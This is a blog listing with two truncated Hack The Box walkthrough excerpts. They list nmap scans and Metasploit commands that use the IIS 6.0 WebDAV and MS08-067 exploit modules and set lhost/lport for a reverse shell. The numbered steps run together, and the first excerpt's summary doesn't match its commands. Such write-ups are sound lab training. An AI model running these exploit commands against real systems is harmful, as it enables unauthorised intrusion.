It is easy machine from hackthebox. Which includes little web directory enumeration which leads to password leaks. Then with the help of msfconsole we get initial shell . After some basic enumeration gets password for a ssh user. Followed by privilege escalation by abusing sudo rights in this it was
Commands used 1-nmap -sC -v 10.10.10.152-msfconsle3-use exploit/windows/iis/iis_webdav_scstoragepathfromurl4-set targeturi /_vti_bin5-set rhosts 10.10.14.205-set lhost your_ip6-set lport 12347-run Steps involved Steps invloved 1-Port Scanning2-Searching exploit for IIS 6.03-Exploiting IIS with metasploit Port scan Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-16 23:06 EDT NSE: Loaded 119 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 23:06 Completed NSE … Read more
Its an easy box from hack the box which is very easy and it is more of CVE type. Commands used nmap -sC -sV -O -v -oA initial 10.10.10.4 msfconsole use exploit/windows/smb/ms08_067_netapi show options Steps involved EnumerationFinding exploitUsing metasploit module to exploit it. Enumeration Nmap Scan Increasing send delay for 10.10.10.4 from 0 to 5 … Read more
